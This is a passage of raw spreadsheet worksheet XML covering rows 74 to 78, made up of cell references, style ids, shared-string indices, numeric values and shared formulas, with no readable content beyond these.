        <v>1.0</v>
      </c>
      <c r="N74" s="74">
        <v>1.0</v>
      </c>
      <c r="O74" s="74">
        <f t="shared" si="1"/>
        <v>1</v>
      </c>
      <c r="P74" s="74">
        <v>1.0</v>
      </c>
      <c r="Q74" s="74">
        <v>0.0</v>
      </c>
      <c r="R74" s="75" t="s">
        <v>106</v>
      </c>
      <c r="S74" s="76" t="s">
        <v>799</v>
      </c>
      <c r="T74" s="76" t="s">
        <v>12</v>
      </c>
      <c r="U74" s="77" t="s">
        <v>800</v>
      </c>
      <c r="V74" s="76" t="s">
        <v>801</v>
      </c>
      <c r="W74" s="76" t="s">
        <v>802</v>
      </c>
      <c r="X74" s="75" t="s">
        <v>13</v>
      </c>
      <c r="Y74" s="75" t="s">
        <v>106</v>
      </c>
      <c r="Z74" s="75" t="s">
        <v>112</v>
      </c>
      <c r="AA74" s="99" t="s">
        <v>13</v>
      </c>
      <c r="AB74" s="75" t="s">
        <v>112</v>
      </c>
      <c r="AC74" s="75" t="s">
        <v>13</v>
      </c>
      <c r="AD74" s="78" t="s">
        <v>12</v>
      </c>
      <c r="AE74" s="78" t="s">
        <v>12</v>
      </c>
      <c r="AF74" s="78" t="s">
        <v>12</v>
      </c>
      <c r="AG74" s="79" t="s">
        <v>12</v>
      </c>
      <c r="AH74" s="78" t="s">
        <v>12</v>
      </c>
      <c r="AI74" s="78"/>
      <c r="AJ74" s="78"/>
      <c r="AK74" s="78" t="str">
        <f t="shared" si="2"/>
        <v/>
      </c>
      <c r="AL74" s="78"/>
      <c r="AM74" s="78"/>
      <c r="AN74" s="78"/>
      <c r="AO74" s="78"/>
      <c r="AP74" s="80"/>
      <c r="AQ74" s="80"/>
      <c r="AR74" s="80"/>
      <c r="AS74" s="80">
        <v>0.0</v>
      </c>
      <c r="AT74" s="80"/>
      <c r="AU74" s="80"/>
      <c r="AV74" s="80"/>
      <c r="AW74" s="80"/>
      <c r="AX74" s="80"/>
      <c r="AY74" s="80"/>
      <c r="AZ74" s="81">
        <f t="shared" si="3"/>
        <v>0</v>
      </c>
      <c r="BA74" s="82" t="s">
        <v>12</v>
      </c>
      <c r="BB74" s="82" t="s">
        <v>12</v>
      </c>
      <c r="BC74" s="82" t="s">
        <v>12</v>
      </c>
      <c r="BD74" s="79" t="s">
        <v>12</v>
      </c>
      <c r="BE74" s="82" t="s">
        <v>12</v>
      </c>
      <c r="BF74" s="82"/>
      <c r="BG74" s="82"/>
      <c r="BH74" s="82" t="str">
        <f t="shared" si="4"/>
        <v/>
      </c>
      <c r="BI74" s="82"/>
      <c r="BJ74" s="82"/>
      <c r="BK74" s="82"/>
      <c r="BL74" s="82"/>
      <c r="BM74" s="83"/>
      <c r="BN74" s="83"/>
      <c r="BO74" s="83"/>
      <c r="BP74" s="83">
        <v>0.0</v>
      </c>
      <c r="BQ74" s="83"/>
      <c r="BR74" s="83"/>
      <c r="BS74" s="83"/>
      <c r="BT74" s="83"/>
      <c r="BU74" s="83"/>
      <c r="BV74" s="83"/>
      <c r="BW74" s="84">
        <f t="shared" si="5"/>
        <v>0</v>
      </c>
      <c r="BX74" s="85" t="s">
        <v>12</v>
      </c>
      <c r="BY74" s="85" t="s">
        <v>12</v>
      </c>
      <c r="BZ74" s="85" t="s">
        <v>12</v>
      </c>
      <c r="CA74" s="79" t="s">
        <v>12</v>
      </c>
      <c r="CB74" s="85" t="s">
        <v>12</v>
      </c>
      <c r="CC74" s="85"/>
      <c r="CD74" s="85"/>
      <c r="CE74" s="85" t="str">
        <f t="shared" si="6"/>
        <v/>
      </c>
      <c r="CF74" s="85"/>
      <c r="CG74" s="85"/>
      <c r="CH74" s="85"/>
      <c r="CI74" s="85"/>
      <c r="CJ74" s="86"/>
      <c r="CK74" s="86"/>
      <c r="CL74" s="86"/>
      <c r="CM74" s="86">
        <v>0.0</v>
      </c>
      <c r="CN74" s="86"/>
      <c r="CO74" s="86"/>
      <c r="CP74" s="86"/>
      <c r="CQ74" s="86"/>
      <c r="CR74" s="86"/>
      <c r="CS74" s="86"/>
      <c r="CT74" s="87">
        <f t="shared" si="7"/>
        <v>0</v>
      </c>
      <c r="CU74" s="88" t="s">
        <v>803</v>
      </c>
      <c r="CV74" s="88">
        <v>4.0</v>
      </c>
      <c r="CW74" s="88">
        <v>698.0</v>
      </c>
      <c r="CX74" s="79" t="s">
        <v>792</v>
      </c>
      <c r="CY74" s="88" t="s">
        <v>804</v>
      </c>
      <c r="CZ74" s="88"/>
      <c r="DA74" s="88"/>
      <c r="DB74" s="88" t="str">
        <f t="shared" si="8"/>
        <v/>
      </c>
      <c r="DC74" s="88"/>
      <c r="DD74" s="88"/>
      <c r="DE74" s="88"/>
      <c r="DF74" s="88"/>
      <c r="DG74" s="89"/>
      <c r="DH74" s="89"/>
      <c r="DI74" s="89"/>
      <c r="DJ74" s="89">
        <v>1.0</v>
      </c>
      <c r="DK74" s="89"/>
      <c r="DL74" s="89"/>
      <c r="DM74" s="89"/>
      <c r="DN74" s="89"/>
      <c r="DO74" s="89"/>
      <c r="DP74" s="89"/>
      <c r="DQ74" s="90">
        <f t="shared" si="9"/>
        <v>1</v>
      </c>
      <c r="DR74" s="91"/>
      <c r="DS74" s="92">
        <v>48370.0</v>
      </c>
      <c r="DT74" s="93">
        <v>1.0</v>
      </c>
      <c r="DU74" s="93">
        <v>2.0</v>
      </c>
      <c r="DV74" s="94" t="s">
        <v>12</v>
      </c>
      <c r="DW74" s="94" t="s">
        <v>12</v>
      </c>
      <c r="DX74" s="94" t="s">
        <v>12</v>
      </c>
      <c r="DY74" s="94" t="s">
        <v>12</v>
      </c>
      <c r="DZ74" s="94" t="s">
        <v>12</v>
      </c>
      <c r="EA74" s="94" t="s">
        <v>12</v>
      </c>
      <c r="EB74" s="74">
        <v>18.0</v>
      </c>
      <c r="EC74" s="74">
        <v>1.0</v>
      </c>
      <c r="ED74" s="95">
        <f t="shared" si="10"/>
        <v>1</v>
      </c>
      <c r="EE74" s="96" t="s">
        <v>13</v>
      </c>
    </row>
    <row r="75" ht="153.75" customHeight="1">
      <c r="B75" s="71" t="s">
        <v>658</v>
      </c>
      <c r="C75" s="72" t="s">
        <v>12</v>
      </c>
      <c r="D75" s="72" t="s">
        <v>659</v>
      </c>
      <c r="E75" s="72" t="s">
        <v>756</v>
      </c>
      <c r="F75" s="72" t="s">
        <v>757</v>
      </c>
      <c r="G75" s="97" t="s">
        <v>794</v>
      </c>
      <c r="H75" s="72" t="s">
        <v>795</v>
      </c>
      <c r="I75" s="73" t="s">
        <v>805</v>
      </c>
      <c r="J75" s="73" t="s">
        <v>706</v>
      </c>
      <c r="K75" s="73" t="s">
        <v>806</v>
      </c>
      <c r="L75" s="74">
        <v>1425.0</v>
      </c>
      <c r="M75" s="74">
        <v>1.0</v>
      </c>
      <c r="N75" s="74">
        <v>1.0</v>
      </c>
      <c r="O75" s="74">
        <f t="shared" si="1"/>
        <v>1</v>
      </c>
      <c r="P75" s="74">
        <v>1.0</v>
      </c>
      <c r="Q75" s="74">
        <v>0.0</v>
      </c>
      <c r="R75" s="75" t="s">
        <v>106</v>
      </c>
      <c r="S75" s="76" t="s">
        <v>807</v>
      </c>
      <c r="T75" s="76" t="s">
        <v>12</v>
      </c>
      <c r="U75" s="77" t="s">
        <v>808</v>
      </c>
      <c r="V75" s="76" t="s">
        <v>809</v>
      </c>
      <c r="W75" s="76" t="s">
        <v>810</v>
      </c>
      <c r="X75" s="75" t="s">
        <v>13</v>
      </c>
      <c r="Y75" s="75" t="s">
        <v>106</v>
      </c>
      <c r="Z75" s="75" t="s">
        <v>112</v>
      </c>
      <c r="AA75" s="99" t="s">
        <v>13</v>
      </c>
      <c r="AB75" s="75" t="s">
        <v>112</v>
      </c>
      <c r="AC75" s="75" t="s">
        <v>13</v>
      </c>
      <c r="AD75" s="78" t="s">
        <v>12</v>
      </c>
      <c r="AE75" s="78" t="s">
        <v>12</v>
      </c>
      <c r="AF75" s="78" t="s">
        <v>12</v>
      </c>
      <c r="AG75" s="79" t="s">
        <v>12</v>
      </c>
      <c r="AH75" s="78" t="s">
        <v>12</v>
      </c>
      <c r="AI75" s="78"/>
      <c r="AJ75" s="78"/>
      <c r="AK75" s="78" t="str">
        <f t="shared" si="2"/>
        <v/>
      </c>
      <c r="AL75" s="78"/>
      <c r="AM75" s="78"/>
      <c r="AN75" s="78"/>
      <c r="AO75" s="78"/>
      <c r="AP75" s="80"/>
      <c r="AQ75" s="80"/>
      <c r="AR75" s="80"/>
      <c r="AS75" s="80">
        <v>0.0</v>
      </c>
      <c r="AT75" s="80"/>
      <c r="AU75" s="80"/>
      <c r="AV75" s="80"/>
      <c r="AW75" s="80"/>
      <c r="AX75" s="80"/>
      <c r="AY75" s="80"/>
      <c r="AZ75" s="81">
        <f t="shared" si="3"/>
        <v>0</v>
      </c>
      <c r="BA75" s="82" t="s">
        <v>12</v>
      </c>
      <c r="BB75" s="82" t="s">
        <v>12</v>
      </c>
      <c r="BC75" s="82" t="s">
        <v>12</v>
      </c>
      <c r="BD75" s="79" t="s">
        <v>12</v>
      </c>
      <c r="BE75" s="82" t="s">
        <v>12</v>
      </c>
      <c r="BF75" s="82"/>
      <c r="BG75" s="82"/>
      <c r="BH75" s="82" t="str">
        <f t="shared" si="4"/>
        <v/>
      </c>
      <c r="BI75" s="82"/>
      <c r="BJ75" s="82"/>
      <c r="BK75" s="82"/>
      <c r="BL75" s="82"/>
      <c r="BM75" s="83"/>
      <c r="BN75" s="83"/>
      <c r="BO75" s="83"/>
      <c r="BP75" s="83">
        <v>0.0</v>
      </c>
      <c r="BQ75" s="83"/>
      <c r="BR75" s="83"/>
      <c r="BS75" s="83"/>
      <c r="BT75" s="83"/>
      <c r="BU75" s="83"/>
      <c r="BV75" s="83"/>
      <c r="BW75" s="84">
        <f t="shared" si="5"/>
        <v>0</v>
      </c>
      <c r="BX75" s="85" t="s">
        <v>12</v>
      </c>
      <c r="BY75" s="85" t="s">
        <v>12</v>
      </c>
      <c r="BZ75" s="85" t="s">
        <v>12</v>
      </c>
      <c r="CA75" s="79" t="s">
        <v>12</v>
      </c>
      <c r="CB75" s="85" t="s">
        <v>12</v>
      </c>
      <c r="CC75" s="85"/>
      <c r="CD75" s="85"/>
      <c r="CE75" s="85" t="str">
        <f t="shared" si="6"/>
        <v/>
      </c>
      <c r="CF75" s="85"/>
      <c r="CG75" s="85"/>
      <c r="CH75" s="85"/>
      <c r="CI75" s="85"/>
      <c r="CJ75" s="86"/>
      <c r="CK75" s="86"/>
      <c r="CL75" s="86"/>
      <c r="CM75" s="86">
        <v>0.0</v>
      </c>
      <c r="CN75" s="86"/>
      <c r="CO75" s="86"/>
      <c r="CP75" s="86"/>
      <c r="CQ75" s="86"/>
      <c r="CR75" s="86"/>
      <c r="CS75" s="86"/>
      <c r="CT75" s="87">
        <f t="shared" si="7"/>
        <v>0</v>
      </c>
      <c r="CU75" s="88" t="s">
        <v>811</v>
      </c>
      <c r="CV75" s="88">
        <v>3.0</v>
      </c>
      <c r="CW75" s="88">
        <v>16.0</v>
      </c>
      <c r="CX75" s="79" t="s">
        <v>792</v>
      </c>
      <c r="CY75" s="88" t="s">
        <v>12</v>
      </c>
      <c r="CZ75" s="88"/>
      <c r="DA75" s="88"/>
      <c r="DB75" s="88" t="str">
        <f t="shared" si="8"/>
        <v/>
      </c>
      <c r="DC75" s="88"/>
      <c r="DD75" s="88"/>
      <c r="DE75" s="88"/>
      <c r="DF75" s="88"/>
      <c r="DG75" s="89"/>
      <c r="DH75" s="89"/>
      <c r="DI75" s="89"/>
      <c r="DJ75" s="89">
        <v>0.0</v>
      </c>
      <c r="DK75" s="89"/>
      <c r="DL75" s="89"/>
      <c r="DM75" s="89"/>
      <c r="DN75" s="89"/>
      <c r="DO75" s="89"/>
      <c r="DP75" s="89"/>
      <c r="DQ75" s="90">
        <f t="shared" si="9"/>
        <v>0</v>
      </c>
      <c r="DR75" s="91"/>
      <c r="DS75" s="93" t="s">
        <v>12</v>
      </c>
      <c r="DT75" s="93" t="s">
        <v>12</v>
      </c>
      <c r="DU75" s="93" t="s">
        <v>12</v>
      </c>
      <c r="DV75" s="94" t="s">
        <v>12</v>
      </c>
      <c r="DW75" s="94" t="s">
        <v>12</v>
      </c>
      <c r="DX75" s="94" t="s">
        <v>12</v>
      </c>
      <c r="DY75" s="94" t="s">
        <v>12</v>
      </c>
      <c r="DZ75" s="94" t="s">
        <v>12</v>
      </c>
      <c r="EA75" s="94" t="s">
        <v>12</v>
      </c>
      <c r="EB75" s="74">
        <v>2.0</v>
      </c>
      <c r="EC75" s="74">
        <v>0.0</v>
      </c>
      <c r="ED75" s="95">
        <f t="shared" si="10"/>
        <v>0</v>
      </c>
      <c r="EE75" s="96" t="s">
        <v>13</v>
      </c>
    </row>
    <row r="76" ht="153.75" customHeight="1">
      <c r="B76" s="71" t="s">
        <v>658</v>
      </c>
      <c r="C76" s="72" t="s">
        <v>12</v>
      </c>
      <c r="D76" s="72" t="s">
        <v>659</v>
      </c>
      <c r="E76" s="72" t="s">
        <v>756</v>
      </c>
      <c r="F76" s="72" t="s">
        <v>757</v>
      </c>
      <c r="G76" s="97" t="s">
        <v>794</v>
      </c>
      <c r="H76" s="72" t="s">
        <v>795</v>
      </c>
      <c r="I76" s="73" t="s">
        <v>812</v>
      </c>
      <c r="J76" s="73" t="s">
        <v>706</v>
      </c>
      <c r="K76" s="73" t="s">
        <v>813</v>
      </c>
      <c r="L76" s="74">
        <v>2.0</v>
      </c>
      <c r="M76" s="74">
        <v>1.0</v>
      </c>
      <c r="N76" s="74">
        <v>1.0</v>
      </c>
      <c r="O76" s="74">
        <f t="shared" si="1"/>
        <v>1</v>
      </c>
      <c r="P76" s="74">
        <v>1.0</v>
      </c>
      <c r="Q76" s="74">
        <v>0.0</v>
      </c>
      <c r="R76" s="75" t="s">
        <v>106</v>
      </c>
      <c r="S76" s="76" t="s">
        <v>814</v>
      </c>
      <c r="T76" s="76" t="s">
        <v>12</v>
      </c>
      <c r="U76" s="77" t="s">
        <v>815</v>
      </c>
      <c r="V76" s="76" t="s">
        <v>816</v>
      </c>
      <c r="W76" s="76" t="s">
        <v>817</v>
      </c>
      <c r="X76" s="75" t="s">
        <v>13</v>
      </c>
      <c r="Y76" s="75" t="s">
        <v>106</v>
      </c>
      <c r="Z76" s="75" t="s">
        <v>112</v>
      </c>
      <c r="AA76" s="99" t="s">
        <v>13</v>
      </c>
      <c r="AB76" s="75" t="s">
        <v>112</v>
      </c>
      <c r="AC76" s="75" t="s">
        <v>13</v>
      </c>
      <c r="AD76" s="78" t="s">
        <v>12</v>
      </c>
      <c r="AE76" s="78" t="s">
        <v>12</v>
      </c>
      <c r="AF76" s="78" t="s">
        <v>12</v>
      </c>
      <c r="AG76" s="79" t="s">
        <v>12</v>
      </c>
      <c r="AH76" s="78" t="s">
        <v>12</v>
      </c>
      <c r="AI76" s="78"/>
      <c r="AJ76" s="78"/>
      <c r="AK76" s="78" t="str">
        <f t="shared" si="2"/>
        <v/>
      </c>
      <c r="AL76" s="78"/>
      <c r="AM76" s="78"/>
      <c r="AN76" s="78"/>
      <c r="AO76" s="78"/>
      <c r="AP76" s="80"/>
      <c r="AQ76" s="80"/>
      <c r="AR76" s="80"/>
      <c r="AS76" s="80">
        <v>0.0</v>
      </c>
      <c r="AT76" s="80"/>
      <c r="AU76" s="80"/>
      <c r="AV76" s="80"/>
      <c r="AW76" s="80"/>
      <c r="AX76" s="80"/>
      <c r="AY76" s="80"/>
      <c r="AZ76" s="81">
        <f t="shared" si="3"/>
        <v>0</v>
      </c>
      <c r="BA76" s="82" t="s">
        <v>12</v>
      </c>
      <c r="BB76" s="82" t="s">
        <v>12</v>
      </c>
      <c r="BC76" s="82" t="s">
        <v>12</v>
      </c>
      <c r="BD76" s="79" t="s">
        <v>12</v>
      </c>
      <c r="BE76" s="82" t="s">
        <v>12</v>
      </c>
      <c r="BF76" s="82"/>
      <c r="BG76" s="82"/>
      <c r="BH76" s="82" t="str">
        <f t="shared" si="4"/>
        <v/>
      </c>
      <c r="BI76" s="82"/>
      <c r="BJ76" s="82"/>
      <c r="BK76" s="82"/>
      <c r="BL76" s="82"/>
      <c r="BM76" s="83"/>
      <c r="BN76" s="83"/>
      <c r="BO76" s="83"/>
      <c r="BP76" s="83">
        <v>0.0</v>
      </c>
      <c r="BQ76" s="83"/>
      <c r="BR76" s="83"/>
      <c r="BS76" s="83"/>
      <c r="BT76" s="83"/>
      <c r="BU76" s="83"/>
      <c r="BV76" s="83"/>
      <c r="BW76" s="84">
        <f t="shared" si="5"/>
        <v>0</v>
      </c>
      <c r="BX76" s="85" t="s">
        <v>12</v>
      </c>
      <c r="BY76" s="85" t="s">
        <v>12</v>
      </c>
      <c r="BZ76" s="85" t="s">
        <v>12</v>
      </c>
      <c r="CA76" s="79" t="s">
        <v>12</v>
      </c>
      <c r="CB76" s="85" t="s">
        <v>12</v>
      </c>
      <c r="CC76" s="85"/>
      <c r="CD76" s="85"/>
      <c r="CE76" s="85" t="str">
        <f t="shared" si="6"/>
        <v/>
      </c>
      <c r="CF76" s="85"/>
      <c r="CG76" s="85"/>
      <c r="CH76" s="85"/>
      <c r="CI76" s="85"/>
      <c r="CJ76" s="86"/>
      <c r="CK76" s="86"/>
      <c r="CL76" s="86"/>
      <c r="CM76" s="86">
        <v>0.0</v>
      </c>
      <c r="CN76" s="86"/>
      <c r="CO76" s="86"/>
      <c r="CP76" s="86"/>
      <c r="CQ76" s="86"/>
      <c r="CR76" s="86"/>
      <c r="CS76" s="86"/>
      <c r="CT76" s="87">
        <f t="shared" si="7"/>
        <v>0</v>
      </c>
      <c r="CU76" s="88" t="s">
        <v>818</v>
      </c>
      <c r="CV76" s="88">
        <v>5.0</v>
      </c>
      <c r="CW76" s="88">
        <v>1007.0</v>
      </c>
      <c r="CX76" s="79" t="s">
        <v>819</v>
      </c>
      <c r="CY76" s="88" t="s">
        <v>12</v>
      </c>
      <c r="CZ76" s="88"/>
      <c r="DA76" s="88"/>
      <c r="DB76" s="88" t="str">
        <f t="shared" si="8"/>
        <v/>
      </c>
      <c r="DC76" s="88"/>
      <c r="DD76" s="88"/>
      <c r="DE76" s="88"/>
      <c r="DF76" s="88"/>
      <c r="DG76" s="89"/>
      <c r="DH76" s="89"/>
      <c r="DI76" s="89"/>
      <c r="DJ76" s="89">
        <v>0.0</v>
      </c>
      <c r="DK76" s="89"/>
      <c r="DL76" s="89"/>
      <c r="DM76" s="89"/>
      <c r="DN76" s="89"/>
      <c r="DO76" s="89"/>
      <c r="DP76" s="89"/>
      <c r="DQ76" s="90">
        <f t="shared" si="9"/>
        <v>0</v>
      </c>
      <c r="DR76" s="91"/>
      <c r="DS76" s="93" t="s">
        <v>12</v>
      </c>
      <c r="DT76" s="93" t="s">
        <v>12</v>
      </c>
      <c r="DU76" s="93" t="s">
        <v>12</v>
      </c>
      <c r="DV76" s="94" t="s">
        <v>12</v>
      </c>
      <c r="DW76" s="94" t="s">
        <v>12</v>
      </c>
      <c r="DX76" s="94" t="s">
        <v>12</v>
      </c>
      <c r="DY76" s="94" t="s">
        <v>12</v>
      </c>
      <c r="DZ76" s="94" t="s">
        <v>12</v>
      </c>
      <c r="EA76" s="94" t="s">
        <v>12</v>
      </c>
      <c r="EB76" s="74">
        <v>1.0</v>
      </c>
      <c r="EC76" s="74">
        <v>0.0</v>
      </c>
      <c r="ED76" s="95">
        <f t="shared" si="10"/>
        <v>0</v>
      </c>
      <c r="EE76" s="96" t="s">
        <v>13</v>
      </c>
    </row>
    <row r="77" ht="153.75" customHeight="1">
      <c r="B77" s="71" t="s">
        <v>658</v>
      </c>
      <c r="C77" s="72" t="s">
        <v>12</v>
      </c>
      <c r="D77" s="72" t="s">
        <v>659</v>
      </c>
      <c r="E77" s="72" t="s">
        <v>756</v>
      </c>
      <c r="F77" s="72" t="s">
        <v>757</v>
      </c>
      <c r="G77" s="97" t="s">
        <v>12</v>
      </c>
      <c r="H77" s="72" t="s">
        <v>12</v>
      </c>
      <c r="I77" s="73" t="s">
        <v>820</v>
      </c>
      <c r="J77" s="73" t="s">
        <v>572</v>
      </c>
      <c r="K77" s="73" t="s">
        <v>821</v>
      </c>
      <c r="L77" s="74">
        <v>1.0</v>
      </c>
      <c r="M77" s="74">
        <v>1.0</v>
      </c>
      <c r="N77" s="74">
        <v>1.0</v>
      </c>
      <c r="O77" s="74">
        <f t="shared" si="1"/>
        <v>1</v>
      </c>
      <c r="P77" s="74">
        <v>1.0</v>
      </c>
      <c r="Q77" s="74">
        <v>0.0</v>
      </c>
      <c r="R77" s="75" t="s">
        <v>187</v>
      </c>
      <c r="S77" s="76" t="s">
        <v>12</v>
      </c>
      <c r="T77" s="76" t="s">
        <v>12</v>
      </c>
      <c r="U77" s="77" t="s">
        <v>822</v>
      </c>
      <c r="V77" s="76" t="s">
        <v>823</v>
      </c>
      <c r="W77" s="76" t="s">
        <v>824</v>
      </c>
      <c r="X77" s="75" t="s">
        <v>13</v>
      </c>
      <c r="Y77" s="75" t="s">
        <v>490</v>
      </c>
      <c r="Z77" s="75" t="s">
        <v>112</v>
      </c>
      <c r="AA77" s="99" t="s">
        <v>13</v>
      </c>
      <c r="AB77" s="75" t="s">
        <v>491</v>
      </c>
      <c r="AC77" s="75" t="s">
        <v>13</v>
      </c>
      <c r="AD77" s="78" t="s">
        <v>12</v>
      </c>
      <c r="AE77" s="78" t="s">
        <v>12</v>
      </c>
      <c r="AF77" s="78" t="s">
        <v>12</v>
      </c>
      <c r="AG77" s="79" t="s">
        <v>12</v>
      </c>
      <c r="AH77" s="78" t="s">
        <v>12</v>
      </c>
      <c r="AI77" s="78"/>
      <c r="AJ77" s="78"/>
      <c r="AK77" s="78" t="str">
        <f t="shared" si="2"/>
        <v/>
      </c>
      <c r="AL77" s="78"/>
      <c r="AM77" s="78"/>
      <c r="AN77" s="78"/>
      <c r="AO77" s="78"/>
      <c r="AP77" s="80"/>
      <c r="AQ77" s="80"/>
      <c r="AR77" s="80"/>
      <c r="AS77" s="80">
        <v>0.0</v>
      </c>
      <c r="AT77" s="80"/>
      <c r="AU77" s="80"/>
      <c r="AV77" s="80"/>
      <c r="AW77" s="80"/>
      <c r="AX77" s="80"/>
      <c r="AY77" s="80"/>
      <c r="AZ77" s="81">
        <f t="shared" si="3"/>
        <v>0</v>
      </c>
      <c r="BA77" s="82" t="s">
        <v>12</v>
      </c>
      <c r="BB77" s="82" t="s">
        <v>12</v>
      </c>
      <c r="BC77" s="82" t="s">
        <v>12</v>
      </c>
      <c r="BD77" s="79" t="s">
        <v>12</v>
      </c>
      <c r="BE77" s="82" t="s">
        <v>12</v>
      </c>
      <c r="BF77" s="82"/>
      <c r="BG77" s="82"/>
      <c r="BH77" s="82" t="str">
        <f t="shared" si="4"/>
        <v/>
      </c>
      <c r="BI77" s="82"/>
      <c r="BJ77" s="82"/>
      <c r="BK77" s="82"/>
      <c r="BL77" s="82"/>
      <c r="BM77" s="83"/>
      <c r="BN77" s="83"/>
      <c r="BO77" s="83"/>
      <c r="BP77" s="83">
        <v>0.0</v>
      </c>
      <c r="BQ77" s="83"/>
      <c r="BR77" s="83"/>
      <c r="BS77" s="83"/>
      <c r="BT77" s="83"/>
      <c r="BU77" s="83"/>
      <c r="BV77" s="83"/>
      <c r="BW77" s="84">
        <f t="shared" si="5"/>
        <v>0</v>
      </c>
      <c r="BX77" s="85" t="s">
        <v>12</v>
      </c>
      <c r="BY77" s="85" t="s">
        <v>12</v>
      </c>
      <c r="BZ77" s="85" t="s">
        <v>12</v>
      </c>
      <c r="CA77" s="79" t="s">
        <v>12</v>
      </c>
      <c r="CB77" s="85" t="s">
        <v>12</v>
      </c>
      <c r="CC77" s="85"/>
      <c r="CD77" s="85"/>
      <c r="CE77" s="85" t="str">
        <f t="shared" si="6"/>
        <v/>
      </c>
      <c r="CF77" s="85"/>
      <c r="CG77" s="85"/>
      <c r="CH77" s="85"/>
      <c r="CI77" s="85"/>
      <c r="CJ77" s="86"/>
      <c r="CK77" s="86"/>
      <c r="CL77" s="86"/>
      <c r="CM77" s="86">
        <v>0.0</v>
      </c>
      <c r="CN77" s="86"/>
      <c r="CO77" s="86"/>
      <c r="CP77" s="86"/>
      <c r="CQ77" s="86"/>
      <c r="CR77" s="86"/>
      <c r="CS77" s="86"/>
      <c r="CT77" s="87">
        <f t="shared" si="7"/>
        <v>0</v>
      </c>
      <c r="CU77" s="88" t="s">
        <v>12</v>
      </c>
      <c r="CV77" s="88" t="s">
        <v>12</v>
      </c>
      <c r="CW77" s="88" t="s">
        <v>12</v>
      </c>
      <c r="CX77" s="79" t="s">
        <v>12</v>
      </c>
      <c r="CY77" s="88" t="s">
        <v>12</v>
      </c>
      <c r="CZ77" s="88"/>
      <c r="DA77" s="88"/>
      <c r="DB77" s="88" t="str">
        <f t="shared" si="8"/>
        <v/>
      </c>
      <c r="DC77" s="88"/>
      <c r="DD77" s="88"/>
      <c r="DE77" s="88"/>
      <c r="DF77" s="88"/>
      <c r="DG77" s="89"/>
      <c r="DH77" s="89"/>
      <c r="DI77" s="89"/>
      <c r="DJ77" s="89">
        <v>0.0</v>
      </c>
      <c r="DK77" s="89"/>
      <c r="DL77" s="89"/>
      <c r="DM77" s="89"/>
      <c r="DN77" s="89"/>
      <c r="DO77" s="89"/>
      <c r="DP77" s="89"/>
      <c r="DQ77" s="90">
        <f t="shared" si="9"/>
        <v>0</v>
      </c>
      <c r="DR77" s="91"/>
      <c r="DS77" s="93" t="s">
        <v>12</v>
      </c>
      <c r="DT77" s="93" t="s">
        <v>12</v>
      </c>
      <c r="DU77" s="93" t="s">
        <v>12</v>
      </c>
      <c r="DV77" s="94" t="s">
        <v>12</v>
      </c>
      <c r="DW77" s="94" t="s">
        <v>12</v>
      </c>
      <c r="DX77" s="94" t="s">
        <v>12</v>
      </c>
      <c r="DY77" s="94" t="s">
        <v>12</v>
      </c>
      <c r="DZ77" s="94" t="s">
        <v>12</v>
      </c>
      <c r="EA77" s="94" t="s">
        <v>12</v>
      </c>
      <c r="EB77" s="74">
        <v>0.0</v>
      </c>
      <c r="EC77" s="74">
        <v>0.0</v>
      </c>
      <c r="ED77" s="95">
        <f t="shared" si="10"/>
        <v>0</v>
      </c>
      <c r="EE77" s="96" t="s">
        <v>112</v>
      </c>
    </row>
    <row r="78" ht="153.75" customHeight="1">
      <c r="B78" s="71" t="s">
        <v>658</v>
      </c>
      <c r="C78" s="72" t="s">
        <v>12</v>
      </c>
      <c r="D78" s="72" t="s">
        <v>659</v>
      </c>
      <c r="E78" s="72" t="s">
        <v>825</v>
      </c>
      <c r="F78" s="72" t="s">
        <v>826</v>
      </c>
      <c r="G78" s="72" t="s">
        <v>12</v>
      </c>
      <c r="H78" s="72" t="s">
        <v>12</v>
      </c>
      <c r="I78" s="73" t="s">
        <v>827</v>
      </c>
      <c r="J78" s="73" t="s">
        <v>828</v>
      </c>
      <c r="K78" s="73" t="s">
        <v>829</v>
      </c>
      <c r="L78" s="74">
        <v>11.0</v>
      </c>
      <c r="M78" s="74">
        <v>1.0</v>
      </c>
      <c r="N78" s="74">
        <v>1.0</v>
      </c>
      <c r="O78" s="74">
        <f t="shared" si="1"/>
        <v>1</v>
      </c>
      <c r="P78" s="74">
        <v>1.0</v>
      </c>
      <c r="Q78" s="74">
        <v>0.0</v>
      </c>
      <c r="R78" s="75" t="s">
        <v>187</v>
      </c>
      <c r="S78" s="76" t="s">
        <v>12</v>
      </c>
      <c r="T78" s="76" t="s">
        <v>830</v>
      </c>
      <c r="U78" s="77" t="s">
        <v>831</v>
      </c>
      <c r="V78" s="76" t="s">
        <v>144</v>
      </c>
      <c r="W78" s="76" t="s">
        <v>832</v>
      </c>
      <c r="X78" s="75" t="s">
        <v>13</v>
      </c>
      <c r="Y78" s="75" t="s">
        <v>106</v>
      </c>
      <c r="Z78" s="75" t="s">
        <v>112</v>
      </c>
      <c r="AA78" s="99" t="s">
        <v>13</v>
      </c>
      <c r="AB78" s="75" t="s">
        <v>112</v>
      </c>
      <c r="AC78" s="75" t="s">
        <v>13</v>
      </c>
      <c r="AD78" s="78">
        <v>254.0</v>
      </c>
      <c r="AE78" s="78">
        <v>1.0</v>
      </c>
      <c r="AF78" s="78">
        <v>2.0</v>
      </c>
      <c r="AG78" s="79" t="s">
        <v>12</v>
      </c>
      <c r="AH78" s="78">
        <v>254.0</v>
      </c>
      <c r="AI78" s="78"/>
      <c r="AJ78" s="78"/>
      <c r="AK78" s="78" t="str">
        <f t="shared" si="2"/>
        <v/>
      </c>
      <c r="AL78" s="78"/>
      <c r="AM78" s="78"/>
      <c r="AN78" s="78"/>
      <c r="AO78" s="78"/>
      <c r="AP78" s="80"/>
      <c r="AQ78" s="80"/>
      <c r="AR78" s="80"/>
      <c r="AS78" s="80">
        <v>0.0</v>
      </c>
      <c r="AT78" s="80"/>
      <c r="AU78" s="80"/>
      <c r="AV78" s="80"/>
      <c r="AW78" s="80"/>
      <c r="AX78" s="80"/>
      <c r="AY78" s="80"/>
      <c r="AZ78" s="81">
        <f t="shared" si="3"/>
        <v>0</v>
      </c>
      <c r="BA78" s="82">
        <v>254.0</v>
      </c>
      <c r="BB78" s="82">
        <v>1.0</v>
      </c>
      <c r="BC78" s="82">
        <v>2.0</v>
      </c>
      <c r="BD78" s="79" t="s">
        <v>12</v>
      </c>
      <c r="BE78" s="82">
        <v>254.0</v>
      </c>
      <c r="BF78" s="82"/>
      <c r="BG78" s="82"/>
      <c r="BH78" s="82" t="str">
        <f t="shared" si="4"/>
        <v/>
      </c>
      <c r="BI78" s="82"/>
      <c r="BJ78" s="82"/>
      <c r="BK78" s="82"/>
      <c r="BL78" s="82"/>
